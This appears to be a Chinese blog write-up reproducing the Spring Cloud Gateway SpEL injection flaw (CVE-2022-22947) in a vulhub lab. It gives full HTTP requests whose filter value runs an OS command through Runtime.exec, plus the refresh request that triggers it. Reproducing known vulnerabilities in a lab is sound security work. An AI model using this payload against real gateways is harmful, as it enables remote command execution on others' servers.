Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现

最新推荐文章于 2024-06-06 22:22:50 发布
最新推荐文章于 2024-06-06 22:22:50 发布
阅读量878 收藏 1
点赞数 2
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/125976172
版权

漏洞原理

当使用可用于启用网关执行器的 Spring Cloud Gateway Server jar 时,SpEL也会被使用。而攻击者可以利用SpEL中的函数 StandardEvaluationContext,通过恶意输入来执行远程代码。

原文地址:https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现

打开vulhub,其安装方式可以查看https://blog.csdn.net/Tauil/article/details/125869410?spm=1001.2014.3001.5501,在靶机中输入

cd spring/CVE-2022-22947
sudo docker-compose up -d
sudo docker-compose ps

然后访问根据显示访问http://靶机IP:8080

当网页使用了Spring Cloud Gateway Actuator API,则可以通过GET方式访问 http://靶机IP:8080/actuator/gateway/routes查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,Spring Cloud Gateway Actuator API的使用方式有

IDHTTP方法描述
globalfiltersGET显示应用于路由的全局过滤器列表
routefiltersGET显示应用于特定路由的GatewayFilter工厂列表
refreshPOST刷新路由配置
routesGET显示网关中定义的路由列表
routes/{id}GET显示有关特定路线的信息
routes/{id}POST将新路由添加到网关
routes/{id}DELETE从网关删除现有路由

具体内容可以查看https://blog.csdn.net/qq_30285985/article/details/102995277

在这里插入图片描述
通过查看可以知道这里需要的参数有:

名称作用
route_id路线编号
filters过滤器链表
uri服务器地址

每一个过滤器中都包含有ShortcutConfigurable接口,该接口中的getValue方法就使用到了StandardEvaluationContext来解析SpEL表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器AddResponseHeader

在这里插入图片描述

打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用POST方式提交,而网关最终会将所有的请求交给过滤链表filters进行处理,所以我们将待执行的命令放到filters中,具体数据包为:

POST /actuator/gateway/routes/hacker HTTP/1.1
Host: 靶机IP:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 331

{
  "id": "hacker",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

在这里插入图片描述
然后使用refresh刷新路由配置,refresh也需要用POST方式提交,具体数据包为:

POST /actuator/gateway/refresh HTTP/1.1
Host: 靶机IP:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

浏览器访问http://靶机IP:8080/actuator/gateway/routes查看到路由表配置,此时可以看到多出了我们新添加的路由路径hacker,并且可以看到他已经成功执行了我们输入的命令:whoami

在这里插入图片描述

Tauil
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpringCloudGateway远程代码执行(CVE-2022-22947)
m0_57379855的博客
03-12 1496
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
god_Zeo的安全博客
03-06 5025
0x01 Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。华为云提醒使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。 参考链接: CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability CVE-2022-22947: SPEL CASTING AND EVIL
Spring-Cloud-Gateway-实现XSS、SQL注入拦截
最新发布
lbmydream的博客
06-06 1120
XSS和SQL注入Web应用中常见计算机安全漏洞,文章主要分享通过Spring Cloud Gateway 全局过滤器对XSS和SQL注入进行安全防范。写这篇文章也是因为项目在经过安全组进行安全巡检时发现项目存储该漏洞后进行系统整改,本文的运行结果是经过安全组验证通过。
漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
七天
06-30 1232
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行
whoami
03-03 4751
一、背景 Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 二、漏洞分析 ShortcutConfigurable.java : static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValu..
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
00勇士王子的博客
03-23 531
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator APISpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
SpringCloud Gateway应用案例
08-09
SpringCloud Gateway是一款基于Spring Framework 5、Spring Boot 2以及Project Reactor开发的API网关,它是Spring Cloud生态体系中的重要组件,旨在为微服务架构提供一种简单有效的统一的API路由管理方式。...
SpringCloud组件之 Gateway实战应用
06-05
Spring Cloud Gateway 是一款基于 Spring Framework 5 和 Spring Boot 2 的现代化微服务网关,它设计用于替代 Zuul,提供更简单、更高效的 API 路由管理。本实战应用将深入探讨 Gateway 的核心功能与实际操作,帮助...
Spring Boot Actuator执行器运行原理详解
08-24
Spring Boot Actuator 执行器运行原理详解 Spring Boot Actuator 执行器是 Spring Boot 框架中的一种功能强大且实用的模块,用于监视和管理 Spring Boot 应用程序。在本文中,我们将详细介绍 Spring Boot Actuator ...
spring-cloud-api-gateway
03-19
Spring Cloud API Gateway 是一个基于 Spring Cloud 的微服务网关,它提供了一种集中式路由、过滤器和动态服务发现的功能,使得开发人员可以方便地构建和管理微服务架构中的 API。作为微服务架构的重要组成部分,API...
spring cloud 使用Zuul 实现API网关服务问题
08-27
Spring Cloud 使用 Zuul 实现 API 网关服务问题 在本文中,我们将主要介绍如何使用 Spring Cloud 的 Zuul 组件来实现 API 网关服务问题。 Zuul 是一个基于 Netflix Zuul 的 API 网关组件,它可以解决路由规则和服务...
SpringCloudGateway2.1使用手册中文版.rar
09-04
在使用 SpringCloudGateway2.1 使用手册中文版时,你可以找到关于如何配置路由、使用过滤器、集成服务发现、安全设置等方面的详细指导。手册中应该会包含以下内容: 1. **快速入门**:介绍如何创建基本的 Spring ...
SpringCloud Gateway 漏洞分析 (CVE-2022-22947).doc
07-08
SpringCloud Gateway 漏洞分析 (CVE-2022-22947) SpringCloud GatewaySpring 提供的微服务实现框架,其中包含网关、配置中心和注册中心等内容。网关是 SpringCloud Gateway 的核心组件之一,提供了统一的流量...
spring-cloud-gateway-example-master.zip
07-09
Spring Cloud GatewaySpring官方推出的第二代微服务网关,旨在替代 Zuul,其核心目标是简化API网关的开发和维护。它基于Spring Framework 5、Project ReactorSpring Boot 2构建,支持高并发、低延迟的特性,...
Spring Cloud Gateway SPEL RCE复现
HongYu012的博客
03-05 1162
目录 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Gateway < 3.0.7 p牛的vulhub已经搭好docker了,vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub · GitHub 也可以本地搭建 git clone https://github.com/spring-cloud/spring-cloud-gateway cd sp.
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6516
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
Spring Cloud Gateway Actuator API SpEL 代码注入(CVE-2022-22947)漏洞复现
千寻的博客
03-30 2628
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞发现实验环境复现步骤第一步 发送以下请求第二步 刷新网关。第三步 发送以下请求以检索结果第四步 发送一个 DELETE 请求第五步 再次刷新网关第六步 补充第七步 关闭漏洞环境修复建议免责声明 漏洞名称 Spring Cloud Gateway Actuator API SpEL 代码注入 漏洞编号 CVE-2022-22947 漏洞描述 Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值